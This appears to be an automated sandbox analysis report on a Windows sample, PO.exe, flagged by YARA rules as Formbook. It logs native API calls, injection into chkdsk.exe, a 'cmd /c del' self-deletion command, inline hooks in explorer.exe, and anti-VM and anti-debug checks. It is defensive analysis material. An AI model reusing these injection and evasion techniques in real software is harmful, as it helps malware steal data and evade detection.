          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29820 NtEnumerateKey,1_2_00A29820
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2B040 NtSuspendThread,1_2_00A2B040
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A299D0 NtCreateProcessEx,1_2_00A299D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29950 NtQueueApcThread,1_2_00A29950
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A80 NtOpenDirectoryObject,1_2_00A29A80
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A10 NtQuerySection,1_2_00A29A10
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2A3B0 NtGetContextThread,1_2_00A2A3B0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29B00 NtSetValueKey,1_2_00A29B00
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A295F0 NtQueryInformationFile,1_2_00A295F0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29520 NtWaitForSingleObject,1_2_00A29520
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2AD30 NtSetContextThread,1_2_00A2AD30
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29560 NtWriteFile,1_2_00A29560
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A296D0 NtCreateKey,1_2_00A296D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29610 NtEnumerateValueKey,1_2_00A29610
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29670 NtQueryInformationProcess,1_2_00A29670
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29650 NtQueryValueKey,1_2_00A29650
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29FE0 NtCreateMutant,1_2_00A29FE0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29730 NtQueryVirtualMemory,1_2_00A29730
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2A710 NtOpenProcessToken,1_2_00A2A710
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29760 NtOpenProcess,1_2_00A29760
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29770 NtSetInformationFile,1_2_00A29770
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2A770 NtOpenThread,1_2_00A2A770
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419D60 NtCreateFile,1_1_00419D60
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419E10 NtReadFile,1_1_00419E10
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419E90 NtClose,1_1_00419E90
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,1_1_00419F40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49D60 NtCreateFile,8_2_04B49D60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49E90 NtClose,8_2_04B49E90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49E10 NtReadFile,8_2_04B49E10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49F40 NtAllocateVirtualMemory,8_2_04B49F40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49DB3 NtReadFile,8_2_04B49DB3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49E8A NtClose,8_2_04B49E8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B49F3B NtAllocateVirtualMemory,8_2_04B49F3B
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004010271_2_00401027
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E1001_2_0041E100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E2461_2_0041E246
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041DF121_2_0041DF12
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041DF1C1_2_0041DF1C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A01_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB0901_2_009FB090
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA10021_2_00AA1002
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A041201_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EF9001_2_009EF900
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1EBB01_2_00A1EBB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F841F1_2_009F841F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A125811_2_00A12581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E01_2_009FD5E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E0D201_2_009E0D20
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB1D551_2_00AB1D55
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A06E301_2_00A06E30
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_004010271_1_00401027
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_0041E1001_1_0041E100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_0041E2461_1_0041E246
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B32D908_2_04B32D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B39E3C8_2_04B39E3C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B39E408_2_04B39E40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B32FB08_2_04B32FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4DF128_2_04B4DF12
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4DF1C8_2_04B4DF1C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4E1008_2_04B4E100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4E2468_2_04B4E246
          Source: C:\Users\user\Desktop\PO.exeCode function: String function: 009EB150 appears 35 times
          Source: PO.exe, 00000000.00000003.233217726.000000001F0EF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.282165146.0000000002656000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs PO.exe
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsj9DD.tmpJump to behavior
          Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO.exeVirustotal: Detection: 15%
          Source: PO.exeReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\user\Desktop\PO.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: C:\xampp\htdocs\Cryptor\a3aea962689945e0b965ec319b5ccdaa\Loader\Loader\Release\16znhx5gg.pdb source: PO.exe, 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp, gif000d.dll.0.dr
          Source: Binary string: chkdsk.pdbGCTL source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.232569339.000000001EFD0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PO.exeUnpacked PE file: 1.2.PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E34F push eax; ret 1_2_0041E356
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417CCE push 7FCF5E29h; iretd 1_2_00417CD3
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417CD7 push ebx; retf 1_2_00417CDF
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004164B4 push esi; ret 1_2_004164BD
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417D58 push esp; iretd 1_2_00417D5A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3D0D1 push ecx; ret 1_2_00A3D0E4
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_1_0041E34F push eax; ret 1_1_0041E356
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B464B4 push esi; ret 8_2_04B464BD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B47CD7 push ebx; retf 8_2_04B47CDF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B47CCE push 7FCF5E29h; iretd 8_2_04B47CD3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B47D58 push esp; iretd 8_2_04B47D5A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CEB5 push eax; ret 8_2_04B4CF08
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CF02 push eax; ret 8_2_04B4CF08
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CF0B push eax; ret 8_2_04B4CF72
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4CF6C push eax; ret 8_2_04B4CF72
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04B4E34F push eax; ret 8_2_04B4E356
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEF
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004B398E4 second address: 0000000004B398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004B39B5E second address: 0000000004B39B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 3868Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3868Thread sleep time: -66000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4740Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000002.00000000.260637571.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.242011402.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.242372336.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.239700502.000000000113D000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000002.00000000.239807518.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.262044821.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000002.508445429.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.262044821.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.259019168.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
